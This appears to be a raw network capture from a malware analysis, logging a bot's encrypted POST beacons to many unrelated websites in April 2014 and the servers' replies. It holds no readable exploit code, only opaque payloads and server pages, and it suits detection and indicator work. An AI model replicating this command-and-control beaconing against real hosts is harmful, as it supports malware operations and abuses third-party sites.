oz54Hu5HhCsS 8uSDmyNN9ln/tlBa7cHS4NTejJexPB gGUmeXgQVbfg2A69CKLb
/X gcHATdfINyfnLk5tKU/y9m/8Nacc9Df3L8MRzW/GTqjWjQmXaGwUI1Wrn7HXJ
ZA==
HTTP/1.1 200 OK
Date: Sat, 12 Apr 2014 14:41:49 GMT
Server: Apache
X-SERVER: 33
Last-Modified: Fri, 04 Oct 2013 22:24:11 GMT
ETag: "e130f2-f8b-4e7f1c2f7d8c0"
Accept-Ranges: bytes
Content-Length: 3979
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
<HTML><head>..<TITLE>LexJuridica, Información y Servicios Legales</TITLE> ..<meta name="description" content="Portal Jur.dico que le ofrece amplia informaci.n con la que poder resolver sus problemas legales, y otros servicios como consultas, legislaci.n contratos, foros, registros, abogados, dise.o y alojamiento web, etc.">..<meta name="keywords" content="Derecho, derecho, leyes, ley, legal, legales, legislaci.n, legislacion, espa.a, espana, espa.ol, espanol, abogados, actualizaciones jur.dicas, asesores, busqueda de abogados, contratos, formularios, formulario, documentos legales, spanish law, boletin, boletines, registro, registros, registro mercantil, registro marcas, patentes, marcanet, infotel, asexor, propiedad intelectual, juristas, portal juridico, librer.a jur.dica, , judicial, letrado, consultas, consultor, consultores, lexconsultor.es, lexconsultor, internet, foros, paginas web, webmaster, dise.o paginas web, diseno, alojamiento, promoci.n, dominios, solicitud de dominios, laboral, seguridad social, contratacion, bonificaciones, tramites, despidos, vacaciones, indemnizaciones por despido, prestacion desempleo, desempleo, transformaciones de contratos, recursos, aut.nomos, autonomos, cotizacion, jubilaci.n, jubilacion, incapacidad, invalidez, maternidad, reta, asistencia sanitaria, calendario laboral, salario, salarios, civil, familia, donaciones, compraventa, compra-venta, usufructos, servidumbres, separacion, divorcio, nulidad, matrimonio, capitulaciones matri
<<
<<< skipped >>>
POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 550
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: thesergery.com
Connection: Keep-Alive
Cache-Control: no-cache
vytw77Eu8LMiB60o0NiEoQqaXn/vZeQ9ddjOmkbUVYvVxQTr/1QI3fa WmAxyOyz
PXdgo0PnbObBG1DD8pyOiruC06zi6Q09G2BPYTfUPESENosXN1ANRILIr1socEag
KDMvLwxJ2KlfnQ0J5/c0uLL0jd9M0EMzvVyRuP8PsbpeqT84gy3CQ8t2AmW6zBSB
HdnBEm26QtZGZUIG8dVXSgsuRqc/94KJ6/Ln qPkXZzLxWzCb4gDuqQAW7fFiAtd
enD6zF7A/LjSxLPb 3F9y0GEbyFALUAn1WIf5CbPIhAN1UUvkR qcat7FEQLtY
d69C4mh7KMxpr6QdL1N0IjEkqGbNBqBE6zFgPotPhIk4E3hB trfOZ2607QbXJA1
eG7zmkxlgC8Vz7CpESFhR8pwX7vZRts IW9UlqVx2HxgQozsJeZAxYAeUNyF9I4j
Odvj6CCC99mvb5cKaMGYdLKIdLzgGX9amkYrCI1bYJZpHATUa/124aq9OLLiIWD9
2X/KTJuEeN73WI5Hffk=
HTTP/1.0 400 Bad request: request method denied
Content-type: text/html; charset="utf-8"
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "hXXp://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">..<html lang="en" xml:lang="en" xmlns="hXXp://VVV.w3.org/1999/xhtml">.. <head>.. <title>Request denied by WatchGuard HTTP Proxy</title> .. <style type="text/css">.. body {.. font-family: Arial, Helvetica, Verdana, Sans-Serif;.. font-size: small; .. font-weight: normal; .. color: #000000;.. }.. div { .. margin-left: auto; .. margin-right: auto; .. text-align: center;.. }.. .box { .. width: 600px;.. background-color: #F2F2F2; .. border-left: solid 1px #C2C2C2; .. border-right: solid 1px #C2C2C2; .. vertical-align: middle;.. padding: 20px 10px 20px 10px;.. }.. p {.. text-align: left;.. }.. .red {.. font-weight: bold;.. color: Red;.. text-align: center;.. }.. .band { .. height: 20px;.. color: White;.. background: #333333;.. width: 600px;.. border-left: solid 1px #333333;.. border-right: solid 1px #333333;.. padding: 3px 10px 0px 10px;.. }.. div#wrap {.. margin-top: 50px;.. }.. </style>.. </head>.. <body> .. <div id="wrap">.. <div class="band"></div>.. <div class="
<<
<<< skipped >>>
GET / HTTP/1.1
Accept: */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: VVV.bocr.cz
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Sat, 12 Apr 2014 14:42:01 GMT
Server: Apache/2.2.16 (Debian)
X-Powered-By: PHP/5.3.3-7 squeeze19
Set-Cookie: PHPSESSID=egubaa30odv4qq09os7mpkorj5; path=/; HttpOnly
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=utf-8
5828..<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "hXXp://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="hXXp://VVV.w3.org/1999/xhtml">. <head>. <meta http-equiv="Content-Type" content="text/html;charset=utf-8" />. <meta http-equiv="Content-language" content="cs" />.. <meta name="copyright" content="BOCR Trading s.r.o." /> . . <meta http-equiv="x-xrds-location" content="hXXp://VVV.bocr.cz/xrds.xml" />. .. <title>BOCR kanalizace, odvodn..n.., vodovody</title>.. <meta name="description" content="Kanalizace Ecopal, Weholite. Dren....e Polidren, Drenosewer, Drenopal. ..achty kanaliza..n.., vodom..rn.., ..erpac... J..mky, n..dr..e, septiky. ..OV" />. <meta name="keywords" content="..achty,..erpac..,vodom..rn..,dren....e,trubky,kanalizace,n..dr..e,j..mky, ecopal, weholite" />. <meta name="author" content="ZONER software, a.s." />. <meta name="template" content="ERIS" /> .... . <meta name="google-site-verification" content="x2DKZEDN4HNXZ4BE04iD6kEPU-vowGp3B1F0gM5KPOU" />. . <link rel="shortcut icon" href="hXXp://VVV.bocr.cz/favicon.ico" />. . . . . <link href="/styl/1/" rel="stylesheet" type="text/css" media="screen,projection" />. . <link href="/styl/2/" rel="stylesh
<<
<<< skipped >>>
POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 528
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: shipeliteexpress.com
Connection: Keep-Alive
Cache-Control: no-cache
kdNo pVr56Tn7iVGfMeZUo64VzqjDi9fmRGN ty8IKGS3ScLGWHLguV3DsFUXBJZ
8JJPbmDePk0e0GqMI/O6N49E8On1fwZzItgHi9Ht1cHDo5 JlAiB7/tb G0/E5n/
1qHSF yFb3Nc0c1KQqiSAwEqcqm/GGF9wVs18TwdDrHhL5gzvihEqjkzUdZGsQnC
SSJXRB/7fiVikXaIgZ7euUfs00pgu9YULzD9NLSGaVkCOWB7MeSsKoBaRscQeYrS
GAyEImylHYHQoJdaqiYl4IVPLvvySW 5O kcq3oT4o /SdXzfcdQDyMU5d4TxTV
oYa7xP03fvbcaqz3m6lY4iMvG0B46/aFx/ofy0Bld5 wdcyiBraQEW0EsCbO8EMP
0I01Jplm5G5LdJwMOO5yp3VAvnNA0ANP5yNZ03qiYKeDBT1uk10QR3UeL8FX4Pht
u5T9RhrJk5jVDdQ6vTCCi/Mjy7Wot49j4j3Z50j9xPIcNykqqqQnS9Qb0/saXgs=
HTTP/1.1 503 Service Temporarily Unavailable
Server: cloudflare-nginx
Date: Sat, 12 Apr 2014 14:40:45 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=d82c29802f4da99df986786ea85b242221397313645850; expires=Mon, 23-Dec-2019 23:50:00 GMT; path=/; domain=.shipeliteexpress.com; HttpOnly
Cache-Control: max-age=5
Expires: Sat, 12 Apr 2014 14:40:50 GMT
CF-RAY: 11a02e4e9a93087a-IAD
bf0..<!DOCTYPE HTML>.<html lang="en-US">.<head>. <meta charset="UTF-8" />. <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />. <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" />. <meta name="robots" content="noindex, nofollow" />. <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1" />. <title>Just a moment...</title>. <style type="text/css">. html, body {width: 100%; height: 100%; margin: 0; padding: 0;}. body {background-color: #ffffff; font-family: Helvetica, Arial, sans-serif; font-size: 100%;}. h1 {font-size: 1.5em; color: #404040; text-align: center;}. p {font-size: 1em; color: #404040; text-align: center; margin: 10px 0 0 0;}. #spinner {margin: 0 auto 30px auto; display: block;}. .attribution {margin-top: 20px;}. </style>. <script type="text/javascript">. //<![CDATA[. (function(){. var onReady = function( callback ){. var addListener = document.addEventListener || document.attachEvent,. eventName = document.addEventListener ? 'DOMContentLoaded' : 'onreadystatechange';. addListener.call(document, eventName, function(){ callback(); }, false );. }.. onReady(function(){. var content = document.getElementById('cf-content');. content.style.display = 'block';.. setTimeout(function(){. var t,r,a,f;. t = document.createElement('div');. t.innerHTML="<a href='/'>x</
<<
<<< skipped >>>
POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 468
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: slcago.org
Connection: Keep-Alive
Cache-Control: no-cache
AH6kfJkgyp9/nZnCqJGgETKo7kf3gVia3XwwWbhxF8YxvyjAVVr7DUFhOo5BHBkz
ifBcjOgWlOw6l6drMIkC0C9u7dFzwVOzIGYd1veYHfPWTLA60OpNWXSBR/P5qr7h
YTdA0MPHbgCM7DQ1r4bGxYAICyBqA0Q7SYaJ BQwURRghxKl7yzVfs/8f/svR9Vv
OWG5eM8Q872iDIzXL29G136Rm2UEUi85lGbzMB9yi1uGUfM9EZ0t7hcLHaHTVgo
ZSXV82cdo6NKlH eLuTOUQSCpocsqnUU8WG 3PqQvtiIx8dHgNSLGt/ 6YYAkYw9
ZEm0XyAVu2XZ n9o2ZQlEith6eA8w/Q1wJ8fccKmI ycLStFS7TtoMzkGfKK8sIN
xvdLAJ5/Dkvai/wqDCYrLovb8IkmAtks4Caysns06koCHiYkeZu/jqBVWHnt181X
zXrm
HTTP/1.1 200 OK
Date: Sat, 12 Apr 2014 14:40:15 GMT
Server: Apache
Last-Modified: Thu, 08 Aug 2013 22:47:13 GMT
ETag: "21c5f-190-4e37770631e40"
Accept-Ranges: bytes
Content-Length: 400
X-Powered-By: PleskLin
Connection: close
Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">.<html xmlns="hXXp://VVV.w3.org/1999/xhtml">.<head>.<title>American Guild of Organists</title>.<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />.<meta http-equiv="refresh" content="0;url=hXXp://VVV.slcago.org/main01/" />.</head>..<body>.</body>..</html>...
POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 566
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: robertmcintyre.com.au
Connection: Keep-Alive
Cache-Control: no-cache
FfNZaRRDLaAEjFXd71Np9GejrMGMoXediPmXpL4sJFUkCNQzgOM2btTQ48EBSEV6
Zz1Od/nAh3/5a9drZ3gWhzlZf130MZleQPs2GJuIooyosj8jC9VqD0qkXP250eDa
DgPT7Q/rje2ipCymerm04Rxl1wfAJGL7sUom/Ro3DokIS4gTjpFErAF3Kw86HldW
FkE6swbD/ YwFXh9obSPKUoWL6Gs6AWyUXFlt9mY3hiCa2f6VHOfgWDCtahHTcAW
24TU7AaTwMj38UXwBKW1RhTzIOSR3v1zwiRYp9gaufuYEjzFdHWUf8dvEnNduz1z
JZSd7aGnQwLasSjC6Y64nGVMmjaBW3XRuMWoR mSNH8qHOkeHkIZbePA2PW4RvHR
IiLc6dKFgufUby6ggoaCBkX6mtelKD/xCRtXRFzth1psunCdghJEz46wrf huLnf
hy5sNwm9/YC2NegVV6TR6XMDbEtGDf92F0zz1UNmvNNgdo 1ulfbqKdnmAL5AY4S
qr5riVk7TXk7VM3dxu3r6Rdj2K8jpH0CNJA=
HTTP/1.1 403 Forbidden
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sat, 12 Apr 2014 14:40:26 GMT
Content-Length: 1233
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "hXXp://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">..<html xmlns="hXXp://VVV.w3.org/1999/xhtml">..<head>..<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>..<title>403 - Forbidden: Access is denied.</title>..<style type="text/css">..<!--..body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}..fieldset{padding:0 15px 10px 15px;} ..h1{font-size:2.4em;margin:0;color:#FFF;}..h2{font-size:1.7em;margin:0;color:#CC0000;} ..h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} ..#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;..background-color:#555555;}..#content{margin:0 0 0 2%;position:relative;}...content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}..-->..</style>..</head>..<body>..<div id="header"><h1>Server Error</h1></div>..<div id="content">.. <div class="content-container"><fieldset>.. <h2>403 - Forbidden: Access is denied.</h2>.. <h3>You do not have permission to view this directory or page using the credentials that you supplied.</h3>.. </fieldset></div>..</div>..</body>..</html>....
<<
<<< skipped >>>
POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 480
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: screaminpeach.com
Connection: Keep-Alive
Cache-Control: no-cache
D2m3e YYyp/P9LrQgdsTTglD/YDGGPwKelOeY6Na15GlzMppFYDB1WHBpWbvvsx1
ZgCtG6aTA/MwoeBvQT7FGAw7qSPFxjO7te5SS/V3wD0bTufztSFwOaVI0z2OYW69
Krr/ItwVoYIKPrLkdhD3kmcgp2ckKz2/sSV2NnAwBnxE5YfogqdgTJldNa6httVv
AFyi2FVPwz/145zIO42u a2Za7rlyhSIRbJn5QYETKTt92w/MFb6HKBUApLFQB7H
YqLVFVtiqBw4lSi0LfBo0NubhqfhYnDgdEAnG79rQU5wAqMNtJFz0UVKMU1BYBZp
vq449iXKrRZ2860dEq0GU0OrMeaYHDGDzsooQMjRnXGXKPhrViaedWbVduzGm9pf
B sVyorj9vmDq0QdgsMP6TmwQFyXYP9DQbW3AJPOZpk69M TvAO5ImpruRWPoZlD
9hjAq6oUgSDE880=
HTTP/1.1 403 Forbidden
Server: cloudflare-nginx
Date: Sat, 12 Apr 2014 14:40:16 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=d22805e80c79ca447eea8214c754687c61397313616443; expires=Mon, 23-Dec-2019 23:50:00 GMT; path=/; domain=.screaminpeach.com; HttpOnly
CF-RAY: 11a02d96ce0102b8-IAD
2556..<!DOCTYPE html>.<!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->.<!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->.<!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->.<!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]-->.<head>.<title>Attention Required! | CloudFlare</title>.<meta charset="UTF-8" />.<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />.<meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" />.<meta name="robots" content="noindex, nofollow" />.<meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=1" />.<link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" type="text/css" media="screen,projection" />.<!--[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" type="text/css" media="screen,projection" /><![endif]-->.<style type="text/css">body{margin:0;padding:0}</style>.<!--[if lt IE 9]><script type="text/javascript" src="//cdnjs.cloudflare.com/ajax/libs/jquery/1.9.1/jquery.min.js"></script><![endif]-->.<!--[if gte IE 9]><!--><script type="text/javascript" src="//cdnjs.cloudflare.com/ajax/libs/zepto/1.0/zepto.min.js"></script><!--<![endif]-->.<script type="t
<<
<<< skipped >>>
POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 496
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: churchsupplies.net
Connection: Keep-Alive
Cache-Control: no-cache
f4J YngV6aO2M1yh 9qKhmt3JrrATYV6LGAVMuVYg1N2Z76vWVrT44a5 B/R0Pa9
nIeGA/D9xy/uRBKlpQeL9laxW3brHUfIecvaRthWjh51DTL1XRhvL5rIIQ7QrmQP
i9TVcGFhGogHfX2PgpFhgKvZCp6/PrsqNpFXv/uWquKkKi84kjKT9Uwgym6z LPq
gDUPC2/wgQ4xGRvwEy5iU1w8aJaYPPahWiZMLk2i0mVvbcbl3OThoelJN0sGLDxc
U5CBlEFDhPiMV4NJxLKUBh1kAw24IddVEcAEZChRSZn8NPf6qi9BZ tmWFbCYGms
psJn/PPoXgJ2cn21RQcYIXS4pSLufxNza9V17J PGfhQBB8XYEj9fMlO26pYnpDe
jSYASJ5/gDVf84jxPl4oOVqFj7fSrSk1MelmNMqBqJXn1HOsJkPckAJBGl2/oovW
JOwovJvN/tPy9gTL3baMZ4IhfgVQ0Q==
HTTP/1.1 403 Forbidden
Date: Sat, 12 Apr 2014 14:40:41 GMT
Server: Apache
Accept-Ranges: bytes
Content-Length: 5039
Keep-Alive: timeout=2, max=25
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "hXXp://VVV.w3.org/TR/xhtml11/DTD/xhtml11.dtd">..<head>...<title>Apache HTTP Server Test Page powered by CentOS</title>...<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />...<style type="text/css">....body {.....background-color: #fff;.....color: #000;.....font-size: 0.9em;.....font-family: sans-serif,helvetica;.....margin: 0;.....padding: 0;....}....:link {.....color: #0000FF;....}....:visited {.....color: #0000FF;....}....a:hover {.....color: #3399FF;....}....h1 {.....text-align: center;.....margin: 0;.....padding: 0.6em 2em 0.4em;.....background-color: #3399FF;.....color: #ffffff;.....font-weight: normal;.....font-size: 1.75em;.....border-bottom: 2px solid #000;....}....h1 strong {.....font-weight: bold;....}....h2 {.....font-size: 1.1em;.....font-weight: bold;....}.....content {.....padding: 1em 5em;....}.....content-columns {...../* Setting relative positioning allows for .....absolute positioning for sub-classes */.....position: relative;.....padding-top: 1em;....}.....content-column-left {...../* Value for IE/Win; will be overwritten for other browsers */.....width: 47%;.....padding-right: 3%;.....float: left;.....padding-bottom: 2em;....}.....content-column-right {...../* Values for IE/Win; will be overwritten for other browsers */.....width: 47%;.....padding-left: 3%;.....float: left;.....padding-bottom: 2em;....}.....content-columns>.content-column-left, .content-columns>.content-column-righ
<<
<<< skipped >>>
GET /v02 HTTP/1.1
Accept: */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: VVV.iaiglobal.or.id
Connection: Keep-Alive
Cache-Control: no-cache
GET /v02 HTTP/1.1
Accept: */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: VVV.iaiglobal.or.id
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 301 Moved Permanently
Date: Sat, 12 Apr 2014 14:40:52 GMT
Server: Apache
Location: hXXp://VVV.iaiglobal.or.id/v02/
Vary: Accept-Encoding
Content-Length: 308
Connection: close
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>301 Moved Permanently</title>.</head><body>.<h1>Moved Permanently</h1>.<p>The document has moved <a href="hXXp://VVV.iaiglobal.or.id/v02/">here</a>.</p>.<hr>.<address>Apache Server at VVV.iaiglobal.or.id Port 80</address>.</body></html>...
POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 558
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: neurotoxininstitute.com
Connection: Keep-Alive
Cache-Control: no-cache
AibKcXsS4rKl4j49EuVJM2SSGrWB7i0e32PVChi4zX37Q7M5ewlsdzDAjBuk17na
Fa5MQa5t0etPdaS6tkqxfZyvK4rW/Zb9kazCjxNUMDxmED4j0AAZNjH/TuiHru4w
EV7xonMGy5GgIyFpeek3cnLSmbOQ6YzdRZfp3e890jH5XLLXgyZXQ3/rRLL1D9xG
onfJ1miQjC9oEOr4bOQyftTuoIsYYVsypFVdhvZex3bKii sNMgYRsvb5doiTqXx
pavfvMRGNuGXrdGATkehYvqi6jX3AGAi46RgLgpzlm7LToFPDQRqOuXcFcI9Z/L3
usS3nA0UadIjjwrCkRhe7QCs8w8P9BPfTmRUZlVNiquMeEXbcyiq5zii9RAoMMZv
z/CMjnIN8UBLyhDpzJU6h6uLlfcRP7nd7YSYJgbudlLsAgLw0HlNLgwfqYO5eWTf
B7wlJ fbDQX/4j8wk5zPj9Mvb0TuuoJiVldERdmp4gP1DfhlDNY57wsWSNP9ZAL
KYrWyb9WJMg2eJzGi/VxSAOaP I=
HTTP/1.1 503 Service Temporarily Unavailable
Server: cloudflare-nginx
Date: Sat, 12 Apr 2014 14:41:45 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=da1d2d89df205aa1436f42e743221d8681397313705664; expires=Mon, 23-Dec-2019 23:50:00 GMT; path=/; domain=.neurotoxininstitute.com; HttpOnly
Cache-Control: max-age=5
Expires: Sat, 12 Apr 2014 14:41:50 GMT
CF-RAY: 11a02fc46d130844-IAD
bf2..<!DOCTYPE HTML>.<html lang="en-US">.<head>. <meta charset="UTF-8" />. <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />. <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" />. <meta name="robots" content="noindex, nofollow" />. <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1" />. <title>Just a moment...</title>. <style type="text/css">. html, body {width: 100%; height: 100%; margin: 0; padding: 0;}. body {background-color: #ffffff; font-family: Helvetica, Arial, sans-serif; font-size: 100%;}. h1 {font-size: 1.5em; color: #404040; text-align: center;}. p {font-size: 1em; color: #404040; text-align: center; margin: 10px 0 0 0;}. #spinner {margin: 0 auto 30px auto; display: block;}. .attribution {margin-top: 20px;}. </style>. <script type="text/javascript">. //<![CDATA[. (function(){. var onReady = function( callback ){. var addListener = document.addEventListener || document.attachEvent,. eventName = document.addEventListener ? 'DOMContentLoaded' : 'onreadystatechange';. addListener.call(document, eventName, function(){ callback(); }, false );. }.. onReady(function(){. var content = document.getElementById('cf-content');. content.style.display = 'block';.. setTimeout(function(){. var t,r,a,f;. t = document.createElement('div');. t.innerHTML="<a href='/'>x</
<<
<<< skipped >>>
POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 37
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: tobler-skele.bg
Connection: Keep-Alive
Cache-Control: no-cache
..x...*.6~...H....@ G.. ...!.qU"X<.#.
HTTP/1.1 200 OK
Date: Sat, 12 Apr 2014 14:41:53 GMT
Server: Apache
Last-Modified: Sun, 23 Mar 2014 10:20:12 GMT
ETag: "44a00c9-5212-4f54376ded315"
Accept-Ranges: bytes
Content-Length: 21010
Keep-Alive: timeout=5, max=5
Connection: Keep-Alive
Content-Type: text/html
<html>....<!-- Mirrored from tobler-skele.bg/ by HTTrack Website Copier/3.x [XR&CO'2013], Tue, 18 Mar 2014 10:01:33 GMT -->..<head>..<meta http-equiv="Content-Type" content="text/html; charset=utf-8">..<title>Tobler - .................... .............. - .............., .............., .............. - ................ .. ...... ........</title>....<style>..<!--..table { font-family: Verdana; font-size: 11px }..td { font-family: Verdana; font-size: 11px }..A {...TEXT-DECORATION: none..}..A:hover {...COLOR: blue; TEXT-DECORATION: none..}..-->..</style>..<meta name="description" content="............ .......... ........ .. .................. ........................ .... Baugeruste Tobler AG, .................. .... ................. .................. .............. .. ................ .. ................ ...... ........ .... .................... .............., ................ ................ .. ...............">..<meta name="keywords" content=".................... .. .............. .............., .............., .............., .........., ................ .............., ................ .............., .................. .........., .........., .................. .. .................... ......................, ................ ............">..</head>..<body topmargin="0" leftmargin="0" rightmargin="0" bottommargin="0" bgcolor="#E8E8E8" link="#000080" vlink="#000080" alink="#000080">..<div align="center"&
<<
<<< skipped >>>
POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 113
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: tobler-skele.bg
Connection: Keep-Alive
Cache-Control: no-cache
....^.v.......W.....C>.......g..e.H......%....s.=O....:..x.._....e..6....,.o`...[...p.F.....8........T$.{......
HTTP/1.1 200 OK
Date: Sat, 12 Apr 2014 14:41:54 GMT
Server: Apache
Last-Modified: Sun, 23 Mar 2014 10:20:12 GMT
ETag: "44a00c9-5212-4f54376ded315"
Accept-Ranges: bytes
Content-Length: 21010
Keep-Alive: timeout=5, max=4
Connection: Keep-Alive
Content-Type: text/html
<html>....<!-- Mirrored from tobler-skele.bg/ by HTTrack Website Copier/3.x [XR&CO'2013], Tue, 18 Mar 2014 10:01:33 GMT -->..<head>..<meta http-equiv="Content-Type" content="text/html; charset=utf-8">..<title>Tobler - .................... .............. - .............., .............., .............. - ................ .. ...... ........</title>....<style>..<!--..table { font-family: Verdana; font-size: 11px }..td { font-family: Verdana; font-size: 11px }..A {...TEXT-DECORATION: none..}..A:hover {...COLOR: blue; TEXT-DECORATION: none..}..-->..</style>..<meta name="description" content="............ .......... ........ .. .................. ........................ .... Baugeruste Tobler AG, .................. .... ................. .................. .............. .. ................ .. ................ ...... ........ .... .................... .............., ................ ................ .. ...............">..<meta name="keywords" content=".................... .. .............. .............., .............., .............., .........., ................ .............., ................ .............., .................. .........., .........., .................. .. .................... ......................, ................ ............">..</head>..<body topmargin="0" leftmargin="0" rightmargin="0" bottommargin="0" bgcolor="#E8E8E8" link="#000080" vlink="#000080" alink="#000080">..<div align="center"&
<<
<<< skipped >>>
POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 528
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: rueggeberg.com
Connection: Keep-Alive
Cache-Control: no-cache
W02ueodg0p9tUSzgtqTCmVBkaqJ9A4Peq3QKZYdUhibWavQofsGpgd65AQjk7ysq
kFIEoyuArOl52V3DHqKCsrTIHlb9hd6nPhZwtt7MQbcGLFzdsx PcOBjLpZ0Mg A
R89z fy2or7ujbu9iywWQ63n0rPjpv0yqIZakLSwMVheYxe25Xp0TD6wHL3PBIyi
5 ONEOsGBB5jt2L861ud ip4hSnvSQnEv86Wulb4auI PKmKFKgKeSesYMv0wj4F
19pRjRvTqXNhmjWh5MiCkKr0e3FSCXg9O9iablrWrwH4NvCsxT8lwdAlF8WqHv3V
DurewLSq7pSeyo7nIknYFsPDWssLVYmHuo1hSIH0iXm5x3RSe57N1mkhl5deHtaz
sW2ZheuOqHvFRObuF5odZjGejNzX/ko/5CdTL8EyZ4nF2Etz UkwmCA8WswsvUHa
lOQ1U mcaWvSXv3p2fS08BdRYsVlipdaFKabxsx9Q2OYIRzOa5se8uVCzGOLmPKV
HTTP/1.1 403 Forbidden
Server: nginx/1.2.1
Date: Sat, 12 Apr 2014 14:40:16 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 570
Connection: keep-alive
Vary: Accept-Encoding
<html>..<head><title>403 Forbidden</title></head>..<body bgcolor="white">..<center><h1>403 Forbidden</h1></center>..<hr><center>nginx/1.2.1</center>..</body>..</html>..<!-- a padding to disable MSIE and Chrome friendly error page -->..<!-- a padding to disable MSIE and Chrome friendly error page -->..<!-- a padding to disable MSIE and Chrome friendly error page -->..<!-- a padding to disable MSIE and Chrome friendly error page -->..<!-- a padding to disable MSIE and Chrome friendly error page -->..<!-- a padding to disable MSIE and Chrome friendly error page -->....
POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 550
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: gamblingonlinemagazine.com
Connection: Keep-Alive
Cache-Control: no-cache
c1g1GydOQbJq0gDa1nWy8PDGCgadkfsQS2zq3m8aGoLdROVBHED R92EjdzkfLE9
tBFeD8UJ3Xq8oPojH9NQMZ4iJudacd6NO5mjSJrPlvZrnxZn3chiLOaGu43tRJGd
ikUziOefX6fL734HYMjlDZ8sn4lvToeA1JKYUsLYPyCZV5iPz5eM56fUsv0kzL8U
